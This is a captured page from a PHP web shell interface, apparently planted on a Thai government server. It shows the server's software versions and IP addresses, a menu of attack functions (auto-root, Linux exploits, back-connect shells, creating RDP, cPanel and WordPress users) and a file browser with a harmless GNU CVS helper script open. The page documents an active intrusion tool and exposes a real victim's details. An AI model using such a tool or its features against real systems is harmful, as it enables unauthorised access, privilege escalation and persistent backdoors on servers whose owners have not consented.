Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cvs /
contrib /
[ HOME SHELL ]
Name
Size
Permission
Action
README
5.27
KB
-rw-r--r--
check_cvs
22.34
KB
-rwxr-xr-x
clmerge
3.79
KB
-rwxr-xr-x
cln_hist
2.41
KB
-rwxr-xr-x
commit_prep
3.11
KB
-rwxr-xr-x
cvs2vendor
5.1
KB
-rwxr-xr-x
cvs_acls
37.15
KB
-rwxr-xr-x
cvscheck
2.74
KB
-rwxr-xr-x
debug_check_log
4.74
KB
-rwxr-xr-x
intro.doc
3.91
KB
-rw-r--r--
log
6.29
KB
-rwxr-xr-x
log_accum
21.42
KB
-rwxr-xr-x
mfpipe
3.35
KB
-rwxr-xr-x
pvcs2rcs
36.89
KB
-rwxr-xr-x
rcs-to-cvs
5
KB
-rwxr-xr-x
rcs2log
19.12
KB
-rwxr-xr-x
rcslock
7.94
KB
-rwxr-xr-x
sccs2rcs
9.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cvscheck
#! /bin/sh # # Copyright (C) 1995-2005 The Free Software Foundation, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # cvscheck - identify files added, changed, or removed # in CVS working directory # # Contributed by Lowell Skoog <fluke!lowell@uunet.uu.net> # # This program should be run in a working directory that has been # checked out using CVS. It identifies files that have been added, # changed, or removed in the working directory, but not "cvs # committed". It also determines whether the files have been "cvs # added" or "cvs removed". For directories, it is only practical to # determine whether they have been added. name=cvscheck changes=0 # If we can't run CVS commands in this directory cvs status . > /dev/null 2>&1 if [ $? != 0 ] ; then # Bail out echo "$name: there is no version here; bailing out" 1>&2 exit 1 fi # Identify files added to working directory for file in .* * ; do # Skip '.' and '..' if [ $file = '.' -o $file = '..' ] ; then continue fi # If a regular file if [ -f $file ] ; then if cvs status $file | grep -s '^From:[ ]*New file' ; then echo "file added: $file - not CVS committed" changes=`expr $changes + 1` elif cvs status $file | grep -s '^From:[ ]*no entry for' ; then echo "file added: $file - not CVS added, not CVS committed" changes=`expr $changes + 1` fi # Else if a directory elif [ -d $file -a $file != CVS.adm ] ; then # Move into it cd $file # If CVS commands don't work inside cvs status . > /dev/null 2>&1 if [ $? != 0 ] ; then echo "directory added: $file - not CVS added" changes=`expr $changes + 1` fi # Move back up cd .. fi done # Identify changed files changedfiles=`cvs diff | egrep '^diff' | awk '{print $3}'` for file in $changedfiles ; do echo "file changed: $file - not CVS committed" changes=`expr $changes + 1` done # Identify files removed from working directory removedfiles=`cvs status | egrep '^File:[ ]*no file' | awk '{print $4}'` # Determine whether each file has been cvs removed for file in $removedfiles ; do if cvs status $file | grep -s '^From:[ ]*-' ; then echo "file removed: $file - not CVS committed" else echo "file removed: $file - not CVS removed, not CVS committed" fi changes=`expr $changes + 1` done exit $changes
Close